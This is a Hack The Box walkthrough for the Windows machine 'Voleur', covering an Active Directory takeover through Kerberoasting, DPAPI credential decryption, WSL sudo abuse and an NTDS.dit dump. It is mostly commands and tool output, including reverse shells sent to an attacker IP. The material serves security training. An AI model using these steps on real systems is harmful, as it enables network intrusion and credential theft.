Hack The Box / WINDOWS / 2026-03-18
Hack The Box — Voleur (Windows)
Kerberos-first Active Directory compromise from provided credentials, multi-user pivots with DPAPI credential extraction, Linux backup abuse, and final Administrator access.
Target
- IP:
10.129.90.146
Machine information
As is common in real-life Windows penetration tests, you start the Voleur box with credentials for the following account:
ryan.naylor / HollowOct31Nyt
Recon
sudo nmap -sC -sV 10.129.90.146 -p- -T5 -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-06 04:31:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open tcpwrapped
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_ 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
52456/tcp open msrpc Microsoft Windows RPC
58889/tcp open msrpc Microsoft Windows RPC
58903/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel
nxc smb 10.129.90.146 -u ryan.naylor -p HollowOct31Nyt --shares
SMB 10.129.90.146 445 10.129.90.146 [*] x64 (name:10.129.90.146) (domain:10.129.90.146) (signing:True) (SMBv1:False)
SMB 10.129.90.146 445 10.129.90.146 [-] 10.129.90.146\ryan.naylor:HollowOct31Nyt STATUS_NOT_SUPPORTE
nxc ldap 10.129.90.146 -u ryan.naylor -p HollowOct31Nyt
LDAP 10.129.90.146 389 DC.voleur.htb [*] x64 (name:DC.voleur.htb) (domain:voleur.htb) (signing:True) (SMBv1:False)
LDAP 10.129.90.146 389 DC.voleur.htb [-] voleur.htb\ryan.naylor:HollowOct31Nyt STATUS_NOT_SUPPORTED
Add dc.voleur.htb and voleur.htb to /etc/hosts.
sudo ntpdate dc.voleur.htb
Kerberos setup and domain enumeration
getTGT.py 'voleur.htb'/'ryan.naylor':'HollowOct31Nyt' -dc-ip 10.129.90.146
[*] Saving ticket in ryan.naylor.ccache
export KRB5CCNAME='ryan.naylor.ccache'
nxc ldap dc.voleur.htb -d voleur.htb -k --use-kcache
LDAP dc.voleur.htb 389 DC.voleur.htb [*] x64 (name:DC.voleur.htb) (domain:voleur.htb) (signing:True) (SMBv1:False)
LDAP dc.voleur.htb 389 DC.voleur.htb [+] voleur.htb\ryan.naylor from ccache
Collect domain information with BloodHound:
bloodhound-python -u ryan.naylor -k -no-pass -ns 10.129.90.146 -d voleur.htb -dc dc.voleur.htb -c All --zip
We get a zip archive.
sudo bloodhound
Upload the zip in BloodHound.
nxc smb dc.voleur.htb -d voleur.htb -k --use-kcache --shares
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False)
SMB dc.voleur.htb 445 dc [+] voleur.htb\ryan.naylor from ccache
SMB dc.voleur.htb 445 dc [*] Enumerated shares
SMB dc.voleur.htb 445 dc Share Permissions Remark
SMB dc.voleur.htb 445 dc ----- ----------- ------
SMB dc.voleur.htb 445 dc ADMIN$ Remote Admin
SMB dc.voleur.htb 445 dc C$ Default share
SMB dc.voleur.htb 445 dc Finance
SMB dc.voleur.htb 445 dc HR
SMB dc.voleur.htb 445 dc IPC$ READ Remote IPC
SMB dc.voleur.htb 445 dc IT READ
SMB dc.voleur.htb 445 dc NETLOGON READ Logon server share
SMB dc.voleur.htb 445 dc SYSVOL READ Logon server share
Check the IT share.
Update /etc/krb5.conf and add:
[realms]
VOLEUR.HTB = {
kdc = dc.voleur.htb
admin_server = dc.voleur.htb
}
[domain_realm]
.voleur.htb = VOLEUR.HTB
voleur.htb = VOLEUR.HTB
Run:
smbclient -U ryan.naylor@VOLEUR.HTB --use-kerberos=required //dc.voleur.htb/IT
Enter password HollowOct31Nyt.
smb: \> ls
. D 0 Wed Jan 29 09:10:01 2025
.. DHS 0 Mon Jun 30 21:08:33 2025
First-Line Support D 0 Wed Jan 29 09:40:17 2025
5311743 blocks of size 4096. 895002 blocks available
smb: \> cd "First-Line Support"
smb: \First-Line Support\> ls
. D 0 Wed Jan 29 09:40:17 2025
.. D 0 Wed Jan 29 09:10:01 2025
Access_Review.xlsx A 16896 Thu Jan 30 14:14:25 2025
5311743 blocks of size 4096. 895000 blocks available
smb: \First-Line Support\> get Access_Review.xlsx
getting file \First-Line Support\Access_Review.xlsx of size 16896 as Access_Review.xlsx (434.2 KiloBytes/sec) (average 434.2 KiloBytes/sec)
The file is password-protected.
office2john ./Access_Review.xlsx
Access_Review.xlsx:$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5*500bd7e833dffaa28772a49e987be35b*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c
Put it in a file called hash.
To use John the Ripper with GPU:
./john/run/john --wordlist=rockyou.txt --format=office-opencl ./hash
We find password football1.
Open the Excel file with LibreOffice Calc. It contains:
User Job Title Permissions Notes
Ryan.Naylor First-Line Support Technician SMB Has Kerberos Pre-Auth disabled temporarily to test legacy systems.
Marie.Bryant First-Line Support Technician SMB
Lacey.Miller Second-Line Support Technician Remote Management Users
Todd.Wolfe Second-Line Support Technician Remote Management Users Leaver. Password was reset to NightT1meP1dg3on14 and account deleted.
Jeremy.Combs Third-Line Support Technician Remote Management Users. Has access to Software folder.
Administrator Administrator Domain Admin Not to be used for daily tasks!
Service Accounts
svc_backup Windows Backup Speak to Jeremy!
svc_ldap LDAP Services P/W - M1XyC9pW7qT5Vn
svc_iis IIS Administration P/W - N5pXyW1VqM7CZ8
svc_winrm Remote Management Need to ask Lacey as she reset this recently.
From BloodHound we notice:
svc_ldapis part ofrestore_users, which has aGenericWriterelation toward userlacey.millersvc_ldaphas aWriteSPNrelation toward usersvc_winrm
getTGT.py 'voleur.htb'/'svc_ldap':'M1XyC9pW7qT5Vn' -dc-ip 10.129.90.146
[*] Saving ticket in svc_ldap.ccache
Attempt 1 (did not work): pywhisker
Download pywhisker:
git clone https://github.com/ShutdownRepo/pywhisker.git
python3 pywhisker/pywhisker/pywhisker.py -vv -d 'voleur.htb' --dc-ip 10.129.90.146 --dc-host dc.voleur.htb -d voleur.htb -u svc_ldap -k --no-pass --target lacey.miller --action add
[+] PFX exportiert nach: NxjKvYza.pfx
[i] Passwort für PFX: W545qLO9Jl0LpDpEXtr7
[+] Saved PFX (#PKCS12) certificate & key at path: NxjKvYza.pfx
[*] Must be used with password: W545qLO9Jl0LpDpEXtr7
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
[VERBOSE] Run the following command to obtain a TGT
[VERBOSE] python3 PKINITtools/gettgtpkinit.py -cert-pfx NxjKvYza.pfx -pfx-pass W545qLO9Jl0LpDpEXtr7
voleur.htb/lacey.miller NxjKvYza.ccache
certipy cert -export -pfx NxjKvYza.pfx -password W545qLO9Jl0LpDpEXtr7 -out "lacey_miller.pfx"
[*] Data written to 'lacey_miller.pfx'
certipy auth -dc-ip 10.129.90.146 -pfx lacey_miller.pfx -username lacey.miller -domain voleur.htb
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
This path does not seem to work.
Kerberoast path to svc_winrm
Download targetedKerberoast:
python3 targetedKerberoast/targetedKerberoast.py -v --dc-ip 10.129.90.146 --dc-host dc.voleur.htb -d voleur.htb -u svc_ldap -k --no-pass
We get hashes for lacey.miller and svc_winrm.
Put them in a file called hash.
./hashcat-6.2.6/hashcat.bin -a 0 ./hash ./rockyou.txt
We crack svc_winrm password:
AFireInsidedeOzarctica980219afi
getTGT.py 'voleur.htb'/'svc_winrm':'AFireInsidedeOzarctica980219afi' -dc-ip 10.129.90.146
[*] Saving ticket in svc_winrm.ccache
export KRB5CCNAME='svc_winrm.ccache'
evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
We get a PowerShell shell as svc_winrm and can grab the user flag from the desktop.
The shell is not very stable and sometimes crashes, so we switch to a more stable shell.
Upload nc64.exe to the target machine:
- https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe
On attacker machine:
rlwrap nc -vlnp 4444
On target machine:
.\nc64.exe -e cmd.exe 10.10.15.37 4444
We get a reverse shell.
Pivot to svc_ldap and restore deleted user
We can also get a reverse shell as svc_ldap.
Start listener:
rlwrap nc -vlnp 4444
Download RunasCs and upload it to the victim: - https://github.com/antonioCoco/RunasCs
.\RunasCs.exe 'svc_ldap' 'M1XyC9pW7qT5Vn' "C:\tmp\nc64.exe -e cmd.exe 10.10.15.37 4444"
We get a reverse shell as svc_ldap.
Get PowerShell:
powershell
Upload PowerView.ps1 to the victim machine:
- https://github.com/PowerShellMafia/PowerSploit/raw/master/Recon/PowerView.ps1
. .\PowerView.ps1
Get-DomainObject -Tombstone -LDAPFilter '(isDeleted=TRUE)'
There is todd.wolfe, with distinguished name:
CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb
Restore-ADObject -Identity 'CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb'
We restored todd.wolfe.
Start listener:
rlwrap nc -vlnp 4444
On target machine:
.\RunasCs.exe 'todd.wolfe' 'NightT1meP1dg3on14' "C:\tmp\nc64.exe -e cmd.exe 10.10.15.37 4444"
We get a reverse shell as todd.wolfe.
Get PowerShell:
powershell
The Excel file says todd.wolfe is in Second-Line Support Technician.
cd 'C:\IT\Second-Line Support'
There is an Archived Users folder.
cd Archived Users\todd.wolfe
ls
This is his home directory.
cd C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials
ls
There is one credential file: 772275FAD58525253490A9B0039791D3.
The master key is in:
C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\<sid>\<guid>
where sid is the current user SID and guid is the master key GUID.
Indeed there is a file at:
C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88
whoami /all
We see that todd.wolfe SID is S-1-5-21-3927696377-1337352550-2781715495-1110.
certutil -encode 'C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88' C:\tmp\masterkey_encoded.txt
type C:\tmp\masterkey_encoded.txt
Copy the base64 content into file roba.b64 on attacker machine.
base64 -d roba.b64 > masterkey
dpapi.py masterkey -file masterkey -sid 'S-1-5-21-3927696377-1337352550-2781715495-1110' -password 'NightT1meP1dg3on14'
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
On target machine:
certutil -encode 'C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\772275FAD58525253490A9B0039791D3' C:\tmp\cred_encoded.txt
type C:\tmp\cred_encoded.txt
Copy the base64 content into roba.b64.
base64 -d roba.b64 > cred
dpapi.py credential -file cred -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=Jezzas_Account
Description :
Unknown :
Username : jeremy.combs
Unknown : qT3V9pLXyN7W4m
Pivot to jeremy.combs and Linux side access
Start netcat listener:
rlwrap nc -vlnp 4444
On target machine:
.\RunasCs.exe 'jeremy.combs' 'qT3V9pLXyN7W4m' "C:\tmp\nc64.exe -e cmd.exe 10.10.15.37 4444"
We get a reverse shell as jeremy.combs.
Get PowerShell:
powershell
The Excel file says jeremy.combs is Third-Line Support Technician.
cd C:\IT
cd 'Third-Line Support'
ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/30/2025 8:11 AM Backups
-a---- 1/30/2025 8:10 AM 2602 id_rsa
-a---- 1/30/2025 8:07 AM 186 Note.txt.txt
type Note.txt.txt
Jeremy,
I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.
Please see what you can set up.
Thanks,
Admin
We cannot access the Backups folder.
Copy id_rsa to the attacker machine.
chmod 600 id_rsa
ssh-keygen -y -f id_rsa > id_rsa.pub
cat id_rsa.pub
The user is svc_backup.
ssh -p 2222 svc_backup@dc.voleur.htb -i id_rsa
We get a shell on the Linux system.
sudo -l
Matching Defaults entries for svc_backup on DC:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User svc_backup may run the following commands on DC:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
sudo -i
We become root.
In /mnt/c there is the Windows host filesystem.
cd '/mnt/c/IT/Third-Line Support/backups'
ls -la
total 0
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 08:11 .
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 30 08:11 ..
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 03:49 'Active Directory'
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 03:49 registry
scp -P 2222 -i id_rsa -r svc_backup@dc.voleur.htb:'/mnt/c/IT/Third-Line Support/backups' .
On attacker machine:
cd backups
tree
.
├── Active Directory
│ ├── ntds.dit
│ └── ntds.jfm
└── registry
├── SECURITY
└── SYSTEM
secretsdump.py -system registry/SYSTEM -ntds ./Active\ Directory/ntds.dit LOCAL
Among the hashes, we find Administrator:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
getTGT.py 'voleur.htb'/'Administrator' -hashes ':e656e07c56d831611b577b160b259ad2' -dc-ip 10.129.90.146
[*] Saving ticket in Administrator.ccache
export KRB5CCNAME='Administrator.ccache'
evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
We get a PowerShell shell as Administrator and can read the root flag from the desktop.